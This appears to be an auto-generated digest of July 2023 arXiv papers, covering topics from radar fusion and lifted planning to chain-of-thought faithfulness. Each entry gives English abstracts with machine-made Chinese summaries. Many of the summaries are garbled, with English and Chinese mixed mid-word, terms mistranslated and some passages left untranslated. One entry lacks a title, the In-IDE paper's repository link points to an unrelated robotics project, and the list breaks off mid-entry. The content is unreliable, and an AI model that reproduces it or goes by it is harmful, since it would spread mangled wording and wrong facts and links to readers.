celebrities的行踪具有普遍重要性。例如，政要的行程、他们多少次去过、和他们会见的人，都有深刻的地opolitical和经济意义。尽管新闻文章中包含了明星的旅行信息，但由于缺乏自动旅行计划检测工具，因此无法进行大规模的网络化分析。为了设计这些工具，我们需要超越新闻文章中的差异性：1. 一篇文章可能含有噪音，包括不相关的人和地点，特别是文章长。2. 虽然考虑多篇文章可以确定一次行程，但关键 semantics 仍然分散在不同文章中，困难于有效地聚合。3. 更 than 20% 的文章通过间接提到明星的行程，而不是使用明星名称或地点名称，导致大量行程逃逸常规检测算法。我们将文章内容相关的每个候选地点文本内容模型为一个图，以更好地关联关键信息并抑制噪音。此外，我们还设计了基于注意力机制的特殊池化层，以减少长文章中的噪音。为了补做间接提到的信息，我们构建了名实体知识图，包括人名、组织机构、设施等。具体来说，我们在新闻描述中动态更新事件实体表示，以适应每次事件的不同属性（日期和地点），这些属性不是预处理的事件表示所能捕捉。我们提出的 CeleTrip 模型jointly 训练这些模块，并超越所有基准模型，达到了 82.53% 的 F1 度量。

Lifted Sequential Planning with Lazy Constraint Generation Solvers

paper_url: http://arxiv.org/abs/2307.08242
repo_url: https://github.com/anubhav-cs/Lcg-Plan
paper_authors: Anubhav Singh, Miquel Ramirez, Nir Lipovetzky, Peter J. Stuckey
for: 这篇论文探讨了使用惰 clause Generation（LCG）基于方法的含义Programming（CP）来解决序列类 плани约。
methods: 我们提出了一种新的CP模型，基于启示性的卷积编码方法，不需要落实，选择函数和动作架构的选择成为计划设计的一部分。此编码方法不需要编码框架axioms，并不直接将状态表示为决策变量。我们还提出了一种宣传过程，以示LCG可以扩展计划中的推理方法的可能性。
results: 我们对经典IPC和最新提出的benchmark测试了编码和宣传过程，发现对需要 fewer plan step的计划问题，我们的方法与现有最佳序列计划方法相比，表现很好。

Abstract
This paper studies the possibilities made open by the use of Lazy Clause Generation (LCG) based approaches to Constraint Programming (CP) for tackling sequential classical planning. We propose a novel CP model based on seminal ideas on so-called lifted causal encodings for planning as satisfiability, that does not require grounding, as choosing groundings for functions and action schemas becomes an integral part of the problem of designing valid plans. This encoding does not require encoding frame axioms, and does not explicitly represent states as decision variables for every plan step. We also present a propagator procedure that illustrates the possibilities of LCG to widen the kind of inference methods considered to be feasible in planning as (iterated) CSP solving. We test encodings and propagators over classic IPC and recently proposed benchmarks for lifted planning, and report that for planning problem instances requiring fewer plan steps our methods compare very well with the state-of-the-art in optimal sequential planning.

摘要

ROFusion: Efficient Object Detection using Hybrid Point-wise Radar-Optical Fusion

paper_url: http://arxiv.org/abs/2307.08233
repo_url: https://github.com/liuliu-55/rofusion
paper_authors: Liu Liu, Shuaifeng Zhi, Zhenhua Du, Li Liu, Xinyu Zhang, Kai Huo, Weidong Jiang
for: 这篇论文是针对自动驾驶和智能代理的Radar感知技术进行研究，以提高Radar感知的精度和可靠性。
methods: 本研究采用混合点子标准方法，融合Radar和摄像头数据，以获得多Modal特征表现。此外，本研究还提出了一个新的本地坐标表示方法，实现了对物体检测任务的对象中心坐标。
results: 实验结果显示，与光学图像获得信息相结合后，我们可以实现97.69%的检测精度（与最新的State-of-the-art方法FFT-RadNet的82.86% recall相比）。实验结果还显示了我们的设计选择和实现可行性。

Abstract
Radars, due to their robustness to adverse weather conditions and ability to measure object motions, have served in autonomous driving and intelligent agents for years. However, Radar-based perception suffers from its unintuitive sensing data, which lack of semantic and structural information of scenes. To tackle this problem, camera and Radar sensor fusion has been investigated as a trending strategy with low cost, high reliability and strong maintenance. While most recent works explore how to explore Radar point clouds and images, rich contextual information within Radar observation are discarded. In this paper, we propose a hybrid point-wise Radar-Optical fusion approach for object detection in autonomous driving scenarios. The framework benefits from dense contextual information from both the range-doppler spectrum and images which are integrated to learn a multi-modal feature representation. Furthermore, we propose a novel local coordinate formulation, tackling the object detection task in an object-centric coordinate. Extensive results show that with the information gained from optical images, we could achieve leading performance in object detection (97.69\% recall) compared to recent state-of-the-art methods FFT-RadNet (82.86\% recall). Ablation studies verify the key design choices and practicability of our approach given machine generated imperfect detections. The code will be available at https://github.com/LiuLiu-55/ROFusion.

摘要
雷达因其在不利天气条件下的强健性和能量测量对象运动而服务了多年。然而，雷达感知数据缺乏场景中semantic和结构信息，这使得雷达基于感知难以取得准确的对象检测结果。为解决这问题，Camera和雷达传感器融合已被视为一种流行的策略，具有低成本、高可靠性和强维护性。然而，大多数最新的研究都在探索如何探索雷达点云和图像，而忽略了雷达观测中的丰富contextual信息。在这篇论文中，我们提出了一种混合点位雷达-光学拟合方法，用于自动驾驶场景中的对象检测。该框架利用雷达和光学图像中的稠密contextual信息，将其集成到一个多Modal特征表示中。此外，我们还提出了一种新的本地坐标系表示方法，解决对象检测任务在对象中心坐标系中进行。我们的实验结果显示，通过在光学图像中获取更多的信息，我们可以在自动驾驶场景中实现97.69%的回归率（相比最新的状态艺术法FFT-RadNet的82.86%回归率）。我们还进行了ablation研究，以验证我们的设计方案和实现的可行性。我们的代码将在https://github.com/LiuLiu-55/ROFusion上提供。

Harnessing Scalable Transactional Stream Processing for Managing Large Language Models [Vision]

paper_url: http://arxiv.org/abs/2307.08225
repo_url: None
paper_authors: Shuhao Zhang, Xianzhi Zeng, Yuhao Wu, Zhonghao Yang
for: 本研究旨在探讨大语言模型（LLM）在实时决策环境中的应用，以提高快速、准确、并并发响应的能力。
methods: 本研究提出了一种名为 TStreamLLM 的新框架，它将流处理（TSP）和 LLM 管理集成在一起，以实现高可扩展性和低延迟。
results: 实验结果表明，TStreamLLM 可以高效地处理连续并发的 LLM 更新和使用请求，并且可以在实时患者监测和智能交通管理等应用中提供remarkable的性能。

Abstract
Large Language Models (LLMs) have demonstrated extraordinary performance across a broad array of applications, from traditional language processing tasks to interpreting structured sequences like time-series data. Yet, their effectiveness in fast-paced, online decision-making environments requiring swift, accurate, and concurrent responses poses a significant challenge. This paper introduces TStreamLLM, a revolutionary framework integrating Transactional Stream Processing (TSP) with LLM management to achieve remarkable scalability and low latency. By harnessing the scalability, consistency, and fault tolerance inherent in TSP, TStreamLLM aims to manage continuous & concurrent LLM updates and usages efficiently. We showcase its potential through practical use cases like real-time patient monitoring and intelligent traffic management. The exploration of synergies between TSP and LLM management can stimulate groundbreaking developments in AI and database research. This paper provides a comprehensive overview of challenges and opportunities in this emerging field, setting forth a roadmap for future exploration and development.

摘要

Towards Self-Assembling Artificial Neural Networks through Neural Developmental Programs

paper_url: http://arxiv.org/abs/2307.08197
repo_url: None
paper_authors: Elias Najarro, Shyam Sudhakaran, Sebastian Risi
for: 这个论文的目的是研究如何使用自适应的 neural network 进行自我组织和增长，以优化机器学习性能。
methods: 这个论文使用的方法是通过 Neural Developmental Program (NDP) 来引导 neural network 的发展和自我组织，NDP 通过本地通信来操作。
results: 研究发现，通过使用 NDP 来引导 neural network 的发展和自我组织，可以在不同的机器学习任务和优化方法（包括演化训练、在线 RL、离线 RL 和监督学习）中获得优化的性能。

Abstract
Biological nervous systems are created in a fundamentally different way than current artificial neural networks. Despite its impressive results in a variety of different domains, deep learning often requires considerable engineering effort to design high-performing neural architectures. By contrast, biological nervous systems are grown through a dynamic self-organizing process. In this paper, we take initial steps toward neural networks that grow through a developmental process that mirrors key properties of embryonic development in biological organisms. The growth process is guided by another neural network, which we call a Neural Developmental Program (NDP) and which operates through local communication alone. We investigate the role of neural growth on different machine learning benchmarks and different optimization methods (evolutionary training, online RL, offline RL, and supervised learning). Additionally, we highlight future research directions and opportunities enabled by having self-organization driving the growth of neural networks.

摘要
（biological nervous systems are created in a fundamentally different way than current artificial neural networks, deep learning often requires considerable engineering effort to design high-performing neural architectures, but biological nervous systems are grown through a dynamic self-organizing process, in this paper, we take initial steps toward neural networks that grow through a developmental process that mirrors key properties of embryonic development in biological organisms, the growth process is guided by another neural network called Neural Developmental Program (NDP) and which operates through local communication alone, we investigate the role of neural growth on different machine learning benchmarks and different optimization methods, and highlight future research directions and opportunities enabled by having self-organization driving the growth of neural networks）

HOPE: High-order Polynomial Expansion of Black-box Neural Networks

paper_url: http://arxiv.org/abs/2307.08192
repo_url: https://github.com/harrypotterxtx/hope
paper_authors: Tingxiong Xiao, Weihang Zhang, Yuxiao Cheng, Jinli Suo
for: 提高深度神经网络的可解释性和应用广泛性
methods: 使用高阶多项式扩展法拓展神经网络，计算高阶导数规则，并从导数中获得神经网络的本地解释
results: 提出了一种高精度、低计算复杂度、好 converges的方法，并在深度学习中应用于功能探索、快速推理和特征选择等领域

Abstract
Despite their remarkable performance, deep neural networks remain mostly ``black boxes'', suggesting inexplicability and hindering their wide applications in fields requiring making rational decisions. Here we introduce HOPE (High-order Polynomial Expansion), a method for expanding a network into a high-order Taylor polynomial on a reference input. Specifically, we derive the high-order derivative rule for composite functions and extend the rule to neural networks to obtain their high-order derivatives quickly and accurately. From these derivatives, we can then derive the Taylor polynomial of the neural network, which provides an explicit expression of the network's local interpretations. Numerical analysis confirms the high accuracy, low computational complexity, and good convergence of the proposed method. Moreover, we demonstrate HOPE's wide applications built on deep learning, including function discovery, fast inference, and feature selection. The code is available at https://github.com/HarryPotterXTX/HOPE.git.

摘要
尽管深度神经网络表现很出色，但它们仍然被称为“黑盒子”，表明它们的工作机制不够清晰，从而限制了它们在需要作出合理决策的领域的广泛应用。在这里，我们介绍了一种方法 called HOPE（高阶多项式扩展），它可以将神经网络扩展成一个高阶泰勒多项式在参考输入上。我们 derivated the high-order derivative rule for composite functions, and extend the rule to neural networks to obtain their high-order derivatives quickly and accurately. From these derivatives, we can then derive the Taylor polynomial of the neural network, which provides an explicit expression of the network's local interpretations.数值分析表明我们的方法具有高准确性、低计算复杂性和好 converge 性。此外，我们还证明了HOPE的广泛应用基础深度学习，包括函数发现、快速推理和特征选择。代码可以在https://github.com/HarryPotterXTX/HOPE.git中找到。

Mini-Giants: “Small” Language Models and Open Source Win-Win

paper_url: http://arxiv.org/abs/2307.08189
repo_url: None
paper_authors: Zhengping Zhou, Lezhi Li, Xinxi Chen, Andy Li
for: 本文主要针对小语言模型的研究和应用。
methods: 本文使用了开源社区如Kaggle和小语言模型的技术实现。
results: 本文对小语言模型的比较和评估，并介绍了其应用场景在现实世界中。Here’s a more detailed explanation of each point:
for: The paper is primarily focused on the research and application of small language models.
methods: The paper uses open source communities like Kaggle and small language models to achieve its goals.
results: The paper compares and evaluates small language models, and introduces their application scenarios in the real world.

Abstract
ChatGPT is phenomenal. However, it is prohibitively expensive to train and refine such giant models. Fortunately, small language models are flourishing and becoming more and more competent. We call them "mini-giants". We argue that open source community like Kaggle and mini-giants will win-win in many ways, technically, ethically and socially. In this article, we present a brief yet rich background, discuss how to attain small language models, present a comparative study of small language models and a brief discussion of evaluation methods, discuss the application scenarios where small language models are most needed in the real world, and conclude with discussion and outlook.

摘要
chatgpt是非常出色的，但它的训练和精细化成本却 prohibitively expensive。幸运的是，小语言模型在繁殖和成熔中进步不断。我们称之为“小巨人”。我们认为，开源社区如Kaggle和小巨人在技术、伦理和社会层次上都将取得胜利。在这篇文章中，我们将提供简洁而丰富的背景，讨论如何获得小语言模型，进行小语言模型的比较研究， briefly discuss evaluation methods，讨论实际场景中小语言模型最需要的应用场景，并结束 WITH discussion and outlook。

An Empirical Investigation of Pre-trained Model Selection for Out-of-Distribution Generalization and Calibration

paper_url: http://arxiv.org/abs/2307.08187
repo_url: None
paper_authors: Hiroki Naganuma, Ryuichiro Hataya
for: 提高out-of-distribution泛化性能和预测不确定性
methods: 研究预训练模型选择对finetuning中的out-of-distribution性能和预测不确定性的影响
results: 结果表明预训练模型选择对out-of-distribution性能有显著影响，大型模型表现较好，但需要进一步研究memorization和真正的泛化之间的平衡。

Abstract
In the realm of out-of-distribution generalization tasks, finetuning has risen as a key strategy. While the most focus has been on optimizing learning algorithms, our research highlights the influence of pre-trained model selection in finetuning on out-of-distribution performance and inference uncertainty. Balancing model size constraints of a single GPU, we examined the impact of varying pre-trained datasets and model parameters on performance metrics like accuracy and expected calibration error. Our findings underscore the significant influence of pre-trained model selection, showing marked performance improvements over algorithm choice. Larger models outperformed others, though the balance between memorization and true generalization merits further investigation. Ultimately, our research emphasizes the importance of pre-trained model selection for enhancing out-of-distribution generalization.

摘要
在外域泛化普通化任务中，微调得到了关键策略的地位。虽然大多数注意力集中在学习算法优化上，但我们的研究表明预训练模型选择对于外域性能和推理不确定性具有重要影响。我们在单个GPU的模型大小限制下，研究了不同预训练数据集和模型参数对性能指标如准确率和预期抽象误差的影响。我们的发现表明预训练模型选择具有显著的影响，大型模型表现较好，但是要权衡记忆和真正的普通化问题还需要进一步研究。最终，我们的研究强调预训练模型选择对于提高外域普通化的重要性。

Measuring Faithfulness in Chain-of-Thought Reasoning

paper_url: http://arxiv.org/abs/2307.13702
repo_url: None
paper_authors: Tamera Lanham, Anna Chen, Ansh Radhakrishnan, Benoit Steiner, Carson Denison, Danny Hernandez, Dustin Li, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Karina Nguyen, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Robin Larson, Sam McCandlish, Sandipan Kundu, Saurav Kadavath, Shannon Yang, Thomas Henighan, Timothy Maxwell, Timothy Telleen-Lawton, Tristan Hume, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
for: 这个论文的目的是研究语言模型（LLMs）是否在回答问题时能够提供 faithful（忠实）的解释。
methods: 这个论文使用 intervening 方法来检查 LLMS 是否真正地使用 chain-of-thought（CoT）reasoning 来回答问题。
results: 研究发现，LLMS 在不同任务上 exhibit 大量的差异，有时会强烈依赖 CoT，有时却忽略它。CoT 的性能提升不仅来自于 CoT 的额外计算，还有来自于模型的其他因素。在大型模型和更强大的能力下，LLMS 的 faithful reasoning 减退。总之，我们的结果表明，CoT 可以是 faithful 的，只要选择合适的任务和模型。

Abstract
Large language models (LLMs) perform better when they produce step-by-step, "Chain-of-Thought" (CoT) reasoning before answering a question, but it is unclear if the stated reasoning is a faithful explanation of the model's actual reasoning (i.e., its process for answering the question). We investigate hypotheses for how CoT reasoning may be unfaithful, by examining how the model predictions change when we intervene on the CoT (e.g., by adding mistakes or paraphrasing it). Models show large variation across tasks in how strongly they condition on the CoT when predicting their answer, sometimes relying heavily on the CoT and other times primarily ignoring it. CoT's performance boost does not seem to come from CoT's added test-time compute alone or from information encoded via the particular phrasing of the CoT. As models become larger and more capable, they produce less faithful reasoning on most tasks we study. Overall, our results suggest that CoT can be faithful if the circumstances such as the model size and task are carefully chosen.

摘要
(Simplified Chinese translation)大型语言模型（LLM）在回答问题时会表现更好，但是不清楚它们的具体逻辑是否 faithful（即回答问题的过程）。我们 investigate hypothesis 表明 CoT 逻辑可能不 faithful，通过对 CoT 进行干预（如添加错误或重塑它）来评估模型的预测变化。我们发现模型在不同任务上对 CoT 的依赖程度有很大的变化，有时产生 heavily 依赖 CoT，有时几乎忽略它。CoT 的性能提升不仅不来自 CoT 的添加测试时计算alone 还是从编码在 CoT 中的信息。随着模型的增大和能力的提高，它们在大多数任务上表现出 less faithful reasoning。总之，我们的结果表明，CoT 可以是 faithful，只要选择合适的任务和模型大小。

Question Decomposition Improves the Faithfulness of Model-Generated Reasoning

paper_url: http://arxiv.org/abs/2307.11768
repo_url: https://github.com/anthropics/decompositionfaithfulnesspaper
paper_authors: Ansh Radhakrishnan, Karina Nguyen, Anna Chen, Carol Chen, Carson Denison, Danny Hernandez, Esin Durmus, Evan Hubinger, Jackson Kernion, Kamilė Lukošiūtė, Newton Cheng, Nicholas Joseph, Nicholas Schiefer, Oliver Rausch, Sam McCandlish, Sheer El Showk, Tamera Lanham, Tim Maxwell, Venkatesa Chandrasekaran, Zac Hatfield-Dodds, Jared Kaplan, Jan Brauner, Samuel R. Bowman, Ethan Perez
for: 帮助验证大型自然语言模型（LLM）的正确性和安全性。
methods: 使用Chain-of-Thought（CoT）来询问模型，并让模型生成步骤 reasoning 来回答问题。
results: 通过划分问题为子问题来提高模型生成的 reasoning 的准确性，并在一些最近提出的指标上达到了类似于 CoT 的性能，同时改善了模型生成的 reasoning 的准确性。

Abstract
As large language models (LLMs) perform more difficult tasks, it becomes harder to verify the correctness and safety of their behavior. One approach to help with this issue is to prompt LLMs to externalize their reasoning, e.g., by having them generate step-by-step reasoning as they answer a question (Chain-of-Thought; CoT). The reasoning may enable us to check the process that models use to perform tasks. However, this approach relies on the stated reasoning faithfully reflecting the model's actual reasoning, which is not always the case. To improve over the faithfulness of CoT reasoning, we have models generate reasoning by decomposing questions into subquestions. Decomposition-based methods achieve strong performance on question-answering tasks, sometimes approaching that of CoT while improving the faithfulness of the model's stated reasoning on several recently-proposed metrics. By forcing the model to answer simpler subquestions in separate contexts, we greatly increase the faithfulness of model-generated reasoning over CoT, while still achieving some of the performance gains of CoT. Our results show it is possible to improve the faithfulness of model-generated reasoning; continued improvements may lead to reasoning that enables us to verify the correctness and safety of LLM behavior.

摘要
To improve the faithfulness of CoT reasoning, we have developed a method that involves decomposing questions into subquestions. This approach achieves strong performance on question-answering tasks and sometimes approaches the performance of CoT while improving the faithfulness of the model's stated reasoning on several recently proposed metrics.By forcing the model to answer simpler subquestions in separate contexts, we significantly increase the faithfulness of model-generated reasoning over CoT, while still achieving some of the performance gains of CoT. Our results show that it is possible to improve the faithfulness of model-generated reasoning, and continued improvements may lead to reasoning that enables us to verify the correctness and safety of LLM behavior.

In-IDE Generation-based Information Support with a Large Language Model

paper_url: http://arxiv.org/abs/2307.08177
repo_url: https://github.com/chrisneagu/FTC-Skystone-Dark-Angels-Romania-2020
paper_authors: Daye Nam, Andrew Macvean, Vincent Hellendoorn, Bogdan Vasilescu, Brad Myers
for: 这个论文的目的是研究一种基于大语言模型（LLM）的代码理解UI，以帮助开发者更好地理解代码。
methods: 该论文使用了OpenAI的GPT-3.5和GPT-4模型，通过在IDE中直接建立一个启用对话UI，让开发者可以通过高级请求（ без需要写明文）来请求模型对代码进行解释、提供API调用详细信息、解释领域特有术语以及提供API使用示例。
results: 该论文的用户研究显示，使用该系统可以帮助开发者更快速地完成任务，并且在开发者中间的学生和专业人员之间存在显著的使用和感受差异。研究结果表明，在IDE中基于LLM的启用对话UI是未来工具建造的有前途的方向。

Abstract
Understanding code is challenging, especially when working in new and complex development environments. Code comments and documentation can help, but are typically scarce or hard to navigate. Large language models (LLMs) are revolutionizing the process of writing code. Can they do the same for helping understand it? In this study, we provide a first investigation of an LLM-based conversational UI built directly in the IDE that is geared towards code understanding. Our IDE plugin queries OpenAI's GPT-3.5 and GPT-4 models with four high-level requests without the user having to write explicit prompts: to explain a highlighted section of code, provide details of API calls used in the code, explain key domain-specific terms, and provide usage examples for an API. The plugin also allows for open-ended prompts, which are automatically contextualized to the LLM with the program being edited. We evaluate this system in a user study with 32 participants, which confirms that using our plugin can aid task completion more than web search. We additionally provide a thorough analysis of the ways developers use, and perceive the usefulness of, our system, among others finding that the usage and benefits differ significantly between students and professionals. We conclude that in-IDE prompt-less interaction with LLMs is a promising future direction for tool builders.

摘要
理解代码是困难的，尤其是在新和复杂的开发环境中。代码注释和文档可以帮助，但通常罕见或难以浏览。大型自然语言模型（LLM）正在改变代码写作的过程。可以做到同样的事情吗？在这个研究中，我们提供了一个基于 LLM 的对话式 UI，用于在 IDE 中帮助理解代码。我们的 IDE 插件会向 OpenAI 的 GPT-3.5 和 GPT-4 模型提交四种高级请求，无需用户写明文提示：解释选中代码段落，提供 API 调用使用情况，解释领域特定术语，并提供 API 使用示例。插件还允许开放式提示，这些提示会自动Contextualized 到 LLM 中的当前编辑程序。我们在32名参与者的用户研究中证明，使用我们的插件可以提高任务完成度比 web 搜索更高。我们还进行了对系统的使用和认可的全面分析，其中发现了开发者的使用和认可方式存在很大差异，学生和专业人员的使用和利用方式不同。我们认为，在 IDE 中无需提交提示的 LLM 交互是未来工具制造者的承诺。

Credit Assignment: Challenges and Opportunities in Developing Human-like AI Agents

paper_url: http://arxiv.org/abs/2307.08171
repo_url: None
paper_authors: Thuy Ngoc Nguyen, Chase McDonald, Cleotilde Gonzalez
for: 这种研究旨在探讨人类如何处理延迟反馈，以及计算机方法如TD方法在人工智能中是否准确反映人类行为。
methods: 该研究使用了一种基于经验决策理论的认知模型，Instance-Based Learning Theory (IBLT)，测试不同的信任分配机制在目标寻找 Navigation 任务中的表现。
results: 研究发现，(1) 一个给所有决策平等信任分配的 IBLT 模型能够更好地匹配人类表现，比其他模型更高效；(2) IBL-TD 和 Q-学习模型在开始时 initially 下遇到困难，但 eventually 超越人类表现；(3) 人类决策 Complexity 会影响决策，而模型则不会。

Abstract
Temporal credit assignment is crucial for learning and skill development in natural and artificial intelligence. While computational methods like the TD approach in reinforcement learning have been proposed, it's unclear if they accurately represent how humans handle feedback delays. Cognitive models intend to represent the mental steps by which humans solve problems and perform a number of tasks, but limited research in cognitive science has addressed the credit assignment problem in humans and cognitive models. Our research uses a cognitive model based on a theory of decisions from experience, Instance-Based Learning Theory (IBLT), to test different credit assignment mechanisms in a goal-seeking navigation task with varying levels of decision complexity. Instance-Based Learning (IBL) models simulate the process of making sequential choices with different credit assignment mechanisms, including a new IBL-TD model that combines the IBL decision mechanism with the TD approach. We found that (1) An IBL model that gives equal credit assignment to all decisions is able to match human performance better than other models, including IBL-TD and Q-learning; (2) IBL-TD and Q-learning models underperform compared to humans initially, but eventually, they outperform humans; (3) humans are influenced by decision complexity, while models are not. Our study provides insights into the challenges of capturing human behavior and the potential opportunities to use these models in future AI systems to support human activities.

摘要
时间归属是学习和技能发展中非常重要的因素，而计算方法如TD方法在强化学习中已经被提出，但是不清楚这些方法是否准确地表现出人类对延迟反馈的处理方式。认知模型旨在表现人类解决问题和完成任务的心理步骤，但是认知科学中对归属问题的研究很少。我们的研究使用基于经验决策理论的认知模型（Instance-Based Learning Theory，IBLT）测试不同的归属机制在具有不同决策复杂度的目标寻找 Navigation 任务中的表现。Instance-Based Learning（IBL）模型模拟了在发送连续选择时使用不同归属机制的过程，其中包括一种新的IBL-TD模型，该模型结合IBL决策机制和TD方法。我们发现：1. 给所有决策平等的归属机制的IBL模型能够更好地与人类表现相符，比其他模型，包括IBL-TD和Q学习模型。2. IBL-TD和Q学习模型在初期比人类表现更差，但是在后期它们超越了人类表现。3. 人类受到决策复杂度的影响，而模型则不是。我们的研究提供了人类行为的挑战和未来AI系统中使用这些模型的可能性。

Computing the gradients with respect to all parameters of a quantum neural network using a single circuit

paper_url: http://arxiv.org/abs/2307.08167
repo_url: https://github.com/gphehub/grad2210
paper_authors: Guang Ping He
for: 计算量子神经网络参数shift规则中的函数值时，需要计算两次函数值，一次为单个可变参数的gradient。当总参数数量高时，量子电路需要调整和运行多次。我们提出了一种方法，可以通过单个电路计算所有的gradient，减少电路深度和经典注册数量。
methods: 我们提出的方法使用单个电路计算所有的gradient，减少电路深度和经典注册数量。
results: 我们实验表明，使用我们的方法可以在量子硬件和模拟器上减少 compile时间，从而提高总时间的速度。

Abstract
When computing the gradients of a quantum neural network using the parameter-shift rule, the cost function needs to be calculated twice for the gradient with respect to a single adjustable parameter of the network. When the total number of parameters is high, the quantum circuit for the computation has to be adjusted and run for many times. Here we propose an approach to compute all the gradients using a single circuit only, with a much reduced circuit depth and less classical registers. We also demonstrate experimentally, on both real quantum hardware and simulator, that our approach has the advantages that the circuit takes a significantly shorter time to compile than the conventional approach, resulting in a speedup on the total runtime.

摘要
当计算量子神经网络的梯度使用参数调整规则时，需要计算两次函数值，即每个可调参数的梯度。当总参数数量很高时，量子电路需要调整并运行多次。我们提出了一种方法，可以通过单个电路计算所有梯度，减少电路深度和类别 региsters。我们还实验ally示出，使用我们的方法可以在真正的量子硬件和模拟器上实现速度减少。

Assessing the Quality of Multiple-Choice Questions Using GPT-4 and Rule-Based Methods

paper_url: http://arxiv.org/abs/2307.08161
repo_url: https://github.com/stevenjamesmoore/ectel23
paper_authors: Steven Moore, Huy A. Nguyen, Tianying Chen, John Stamper
for: This paper aims to assess the quality of multiple-choice questions and identify common item-writing flaws present in student-generated questions.
methods: The paper compares the performance of a rule-based method and a machine-learning based method (GPT-4) in automatically assessing multiple-choice questions for item-writing flaws.
results: The rule-based method correctly detected 91% of the flaws identified by human annotators, outperforming GPT-4 which detected 79% of the flaws. The study demonstrates the effectiveness of the two methods in identifying common item-writing flaws present in student-generated questions across different subject areas.

Abstract
Multiple-choice questions with item-writing flaws can negatively impact student learning and skew analytics. These flaws are often present in student-generated questions, making it difficult to assess their quality and suitability for classroom usage. Existing methods for evaluating multiple-choice questions often focus on machine readability metrics, without considering their intended use within course materials and their pedagogical implications. In this study, we compared the performance of a rule-based method we developed to a machine-learning based method utilizing GPT-4 for the task of automatically assessing multiple-choice questions based on 19 common item-writing flaws. By analyzing 200 student-generated questions from four different subject areas, we found that the rule-based method correctly detected 91% of the flaws identified by human annotators, as compared to 79% by GPT-4. We demonstrated the effectiveness of the two methods in identifying common item-writing flaws present in the student-generated questions across different subject areas. The rule-based method can accurately and efficiently evaluate multiple-choice questions from multiple domains, outperforming GPT-4 and going beyond existing metrics that do not account for the educational use of such questions. Finally, we discuss the potential for using these automated methods to improve the quality of questions based on the identified flaws.

摘要
多个选项问题的编写问题可以负面影响学生学习和估计数据。这些问题经常出现在学生自己编写的问题中，使得评估其质量和教学意义困难。现有的评估多个选项问题方法通常会专注于机器可读性指标，不考虑它们在课程材料中的用途和教学意义。在这个研究中，我们比较了我们开发的规则基于方法和GPT-4机器学习方法在自动评估多个选项问题中的表现。通过分析4个不同学科的200个学生自己编写的问题，我们发现了规则基于方法可以准确地检测91%的人类标注员标记的问题，比GPT-4的79%高。我们证明了两种方法在不同学科的学生自己编写的问题中具有普遍性和可靠性，并超过了不考虑教学用途的现有指标。最后，我们讨论了使用自动方法来改进问题的质量基于发现的潜在问题。

paper_url: http://arxiv.org/abs/2307.08141
repo_url: None
paper_authors: Alexander Petrovsky, Yomna Youssef, Kirill Myasoedov, Artem Timoshenko, Vladimir Guneavoi, Ivan Kalinov, Dzmitry Tsetserukou
for: 这个论文是为了提出一种新的导航方法，使两轮机器人在受限的环境中能够穿越障碍物。
methods: 这个算法可以探测和分类障碍物，并将障碍物分为两类：可通过和不可通过。该算法允许两轮机器人找到通过障碍物的路径。
results: 与标准导航算法相比，这个方法可以降低路径长度和总旅行时间，最多降低43%和39%。

Abstract
This paper focuses on Passable Obstacles Aware (POA) planner - a novel navigation method for two-wheeled robots in a highly cluttered environment. The navigation algorithm detects and classifies objects to distinguish two types of obstacles - passable and unpassable. Our algorithm allows two-wheeled robots to find a path through passable obstacles. Such a solution helps the robot working in areas inaccessible to standard path planners and find optimal trajectories in scenarios with a high number of objects in the robot's vicinity. The POA planner can be embedded into other planning algorithms and enables them to build a path through obstacles. Our method decreases path length and the total travel time to the final destination up to 43% and 39%, respectively, comparing to standard path planners such as GVD, A*, and RRT*

摘要

Heterogeneous graphs model spatial relationships between biological entities for breast cancer diagnosis

paper_url: http://arxiv.org/abs/2307.08132
repo_url: None
paper_authors: Akhila Krishna K, Ravi Kant Gupta, Nikhil Cherian Kurian, Pranav Jeevan, Amit Sethi
for: 这篇论文的目的是提高肝癌预后评估和治疗选择的准确性，通过使用对照网络（GNN）模型来捕捉组织内部细胞和组织之间的空间关系。
methods: 这篇论文使用了一种多元GNN模型，它可以捕捉组织内部细胞和组织之间的空间和层次关系，并且与对照网络（CNN）模型进行比较，以评估其表现。
results: 这篇论文的模型在三个公开可用的肝癌数据集（BRIGHT、BreakHis和BACH）上表现出色，其中包括更高的准确性和较少的参数数量，相比于使用 transformer 架构的现有方法。

Abstract
The heterogeneity of breast cancer presents considerable challenges for its early detection, prognosis, and treatment selection. Convolutional neural networks often neglect the spatial relationships within histopathological images, which can limit their accuracy. Graph neural networks (GNNs) offer a promising solution by coding the spatial relationships within images. Prior studies have investigated the modeling of histopathological images as cell and tissue graphs, but they have not fully tapped into the potential of extracting interrelationships between these biological entities. In this paper, we present a novel approach using a heterogeneous GNN that captures the spatial and hierarchical relations between cell and tissue graphs to enhance the extraction of useful information from histopathological images. We also compare the performance of a cross-attention-based network and a transformer architecture for modeling the intricate relationships within tissue and cell graphs. Our model demonstrates superior efficiency in terms of parameter count and achieves higher accuracy compared to the transformer-based state-of-the-art approach on three publicly available breast cancer datasets -- BRIGHT, BreakHis, and BACH.

摘要
乳癌病例的多样性呈现出了早期发现、预后和治疗选择的很大挑战。卷积神经网络经常忽略图像中的空间关系，这限制了它们的准确性。图гра夫神经网络（GNNs）提供了一个有优势的解决方案，它可以编码图像中的空间关系。先前的研究曾经对压缩细胞和组织图进行模型化，但是它们没有充分利用了抽取生物体系间关系的潜力。在本文中，我们提出了一种新的方法，使用多样性GNN来捕捉图像中细胞和组织图中的空间和层次关系，以提高从图像中提取有用信息的能力。我们还对一个混合注意力网络和一个变换器架构进行比较，以评估它们在模型细胞和组织图中的关系。我们的模型在三个公共可用的乳癌数据集（BRIGHT、BreakHis和BACH）上达到了更高的准确率，并且 Parameters 的数量更少。

INFLECT-DGNN: Influencer Prediction with Dynamic Graph Neural Networks

paper_url: http://arxiv.org/abs/2307.08131
repo_url: https://github.com/banking-analytics-lab/inflect
paper_authors: Elena Tiukhova, Emiliano Penaloza, María Óskarsdóttir, Bart Baesens, Monique Snoeck, Cristián Bravo
